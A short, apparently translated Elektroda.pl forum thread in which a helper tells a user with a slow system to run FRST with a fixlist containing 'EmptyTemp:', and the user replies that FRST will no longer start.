Elektroda.pl

Slow system and lots of strange processes in Device Manager

wanio18 10 Jun 2018 15:07 273 2
  • #2 10 Jun 2018 15:45
    krzychupar
    Level 41  

    Open the system Notepad and paste:


    EmptyTemp:

    Save the file as fixlist.txt and place it in the folder where you have FRST.exe.
    Run FRST and click Fix/Napraw.

    0
  • #3 10 Jun 2018 16:33
    wanio18
    Level 7  

    The problem is that now FRST.exe won't even start for me.

    0